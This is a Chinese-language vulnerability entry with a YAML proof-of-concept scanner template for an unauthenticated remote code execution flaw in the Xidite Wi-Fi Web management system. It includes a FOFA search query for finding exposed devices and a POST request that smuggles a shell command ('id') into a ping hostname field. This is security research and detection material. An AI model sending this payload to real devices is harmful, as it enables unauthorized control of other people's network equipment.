漏洞描述
西迪特提供的Wireless解决方案为客户提供一套云管理,可靠性高,覆盖范围广的无线组网产品。旨在解决用户网络覆盖信号范围小,信号低,网络不稳定,组网困难等问题。西迪特Wi-Fi Web管理系统存在未授权远程代码执行漏洞,攻击者通过漏洞可以获取服务器权限。
fofa-query: title=="Wi-Fi Web管理"
xidite-wifi-web-cookie-bypass: 西迪特 Wi-Fi Web管理系统 未授权RCE漏洞
PoC代码[已公开]
id: xidite-wifi-web-cookie-bypass
info:
name: 西迪特 Wi-Fi Web管理系统 未授权RCE漏洞
author: daffainfo
severity: critical
verified: false
description: |
西迪特提供的Wireless解决方案为客户提供一套云管理,可靠性高,覆盖范围广的无线组网产品。旨在解决用户网络覆盖信号范围小,信号低,网络不稳定,组网困难等问题。西迪特Wi-Fi Web管理系统存在未授权远程代码执行漏洞,攻击者通过漏洞可以获取服务器权限。
fofa-query: title=="Wi-Fi Web管理"
reference:
- https://mp.weixin.qq.com/s/IIphedK_Npni5bJsQHfD0A
rules:
r0:
request:
method: POST
path: /cgi-bin/jumpto.php?class=diagnosis&page=config_save&isphp=1
body: "call_function=ping&iface=eth0&hostname=127.0.0.1%3Bid"
expression: response.status == 200 && "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)".bmatches(response.body)
expression: r0()